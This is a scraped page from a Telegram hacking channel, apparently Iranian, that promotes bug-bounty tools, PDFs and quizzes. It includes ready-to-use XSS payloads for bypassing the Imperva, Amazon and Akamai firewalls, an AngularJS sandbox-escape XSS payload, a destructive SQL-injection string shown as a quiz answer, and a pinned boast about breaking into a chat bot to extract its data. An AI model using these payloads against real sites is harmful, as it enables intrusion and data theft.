Eʀᴏ ··ʜᴀᴄᴋ··
4.83K subscribers
65 photos
27 videos
10 files
104 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
XSS WAF Bypass:

Imperva
<details/open/id="&quote;"ontoggle=[JS]>


Amazon
<details/open/id="&quote;"ontoggle=[JS]>


Akamai
<details open id="' &quote;'"ontoggle=[JS]>


EroHack
🗯Boost
📣Twitter
👍61🤨1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «سلام درود🫡 محتوای ویدئو مسیج بالا اینکه دیروز من تونستم به اطلاعات یک ربات چت ناشناس نفوذ کنم و دیتا رو بیرون بکشم. میتونید از لینک زیر رایت‌آپ رو بخونید و استفاده کنید. hello everyone The content of the video message above is that yesterday I was able…»
⚠️AngularJS Client-Side Template Injection as XSS payload for 1.2.24-1.2.29

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}


#Xss #Payload

EroHack
🗯Boost
📣Twitter
🔥51👍1💯1🤨1
Media is too big
VIEW IN TELEGRAM
Introducing the "VulnScan" tool

توضیحات:
ابزار "VulnScan" یک که در زمینه جمع آوری اطلاعات از یک سایت طراحی شده و به شما کمک میکنه اطلاعات مهمی از تارگت خودتون پیدا کنید.
امکانت ابزار از جمله پورت‌اسکن، آسیب پذیری باگ LFI، آسیب پذیری باگ XSS و غیره است.
اطلاعات تکمیلی رو میتونید در فیلم بالا مشاهده کنید.
برای تهیه ابزار میتونید به آیدی زیر پیام بدید.


Description:
The VulnScan tool is designed to gather information from a site and help you find important information about your target.
Features of this tool include port scanning, "LFI" bug vulnerability, "XSS" bug vulnerability, etc.
Additional information can be seen in the video above.
To get the tool, you can send a message to the following address. There is a discount for the first ten people.


#tool #webhacking #bugbounty #XSS

🆔 @gorunero
EroHack
🗯Boost
📣Twitter
👍8🔥2👾1
سلام خدمت دوستان عزیز ویس بالا رو
گوش بدید شاید به کارتون امد.

ID: @gorunero
👍9🤣4🔥1👾1
افراد در دنیای حقیقی
نه به اندازه Instagramشون خوشحال،
نه به اندازه Twitterشون فهمیده،
و نه به اندازه Linkedinشون موفق‌ هستن!
👍26🤣7🤯2🗿2🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Bug Bounty.pdf
842.5 KB
💻 آماده‌ای برای ورود به دنیای هیجان‌انگیز باگ بانتی؟
📜 این مقاله کامل و کاربردی، مسیر تبدیل شدن به یه هانتر حرفه‌ای رو برات روشن می‌کنه.
مطالعه کن، یاد بگیر و یادت نره که این دانش رو با دوستات هم به اشتراک بذاری!
🔗EroHack
👍4🔥1
Nobitex Hack.pdf
532.2 KB
🔥 هک نوبیتکس؛ بزرگ‌ترین حمله سایبری به صرافی ایرانی!
می‌خوای بدونی چطور یه گروه هکری حرفه‌ای تونست میلیون‌ها دلار دارایی کاربران رو از دسترس خارج کنه؟
ما همه جزئیات فنی، نقاط ضعف امنیتی و پیامدهای سیاسی این حمله رو به زبون ساده و تخصصی برات آوردیم.
🚀 این مقاله رو از دست نده، بخون و بفرست برای دوستات!
🔗EroHack
👍3🔥1🤯1😐1
This media is not supported in the widget
VIEW IN TELEGRAM
🔥3💯2
🛡 سوال باگ بانتی - امنیت وب
📊 سطح: متوسط
کدام یک از هدرهای زیر بیشترین نقش را در جلوگیری از حمله XSS دارد؟
Anonymous Quiz
30%
A) X-Frame-Options
57%
B) Content-Security-Policy
12%
C) Strict-Transport-Security
🔥2🤯1🤨1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
👍3🔥3💯1
Eʀᴏ ··ʜᴀᴄᴋ··
Voice message
Hey friends,
I’ve been busy for a while and couldn’t be active on the channel, but I’m back with new plans and stronger content focused on web hacking and bug bounty 💻🔍

If you want the channel to grow and keep going strong, I really need your support.
Please boost the channel and star the posts — even small actions like that give me a lot of motivation to keep going.

Thanks for being here. Stay tuned, some awesome stuff is on the way 😎
🫡3🤯2👍1
🛡️ Bug Bounty Question – Web Security
Level: Easy 📊
Which input is most likely to trigger an SQL Injection vulnerability?
Anonymous Quiz
88%
A) Robert'); DROP TABLE users;--
3%
C) console.log("Hello World")
👍31👾1
🛡️ سوال باگ‌بانتی – امنیت وب
سطح: سخت 📈
کدام هدر Set-Cookie به‌درستی با استفاده از ویژگی SameSite می‌تونه حمله CSRF رو کاهش بده؟
Anonymous Quiz
17%
A) Set-Cookie: sessionId=abc123; SameSite=None; Secure
55%
B) Set-Cookie: sessionId=abc123; SameSite=Lax
29%
C) Set-Cookie: sessionId=abc123; HttpOnly
🔥41🫡1
🔥 𝘽𝙪𝙜𝙃𝙪𝙣𝙩𝙚𝙧 – حرفه‌ای‌ترین ابزار تست باگ به سبک CLI
📟 ابزاری برای شکارچی‌های واقعی باگ!
💥 پشتیبانی از:
• XSS 🧬
• LFI 🗂️
• SQLi 💉
• Redirect 🎯

🛠 قابلیت‌ها:
• اجرای حرفه‌ای با پیلودهای آماده
• نمایش نتایج رنگی با Status Code
• متن‌های متحرک برای تجربه بهتر
• بدون نیاز به نصب پیچیده – فقط یک دستور!
• کاملاً ماژولار، قابل توسعه و گسترش


👾 این ابزار در حال حاضر منتشر نشده
اما اگه این پست ری‌اکشن زیادی بگیره،
به‌صورت کاملاً رایگان منتشرش می‌کنیم!

📣 نظر و ری‌اکشن فراموش نشه 🙌
📡 @EroHack0
🔥21👍4💯3👾2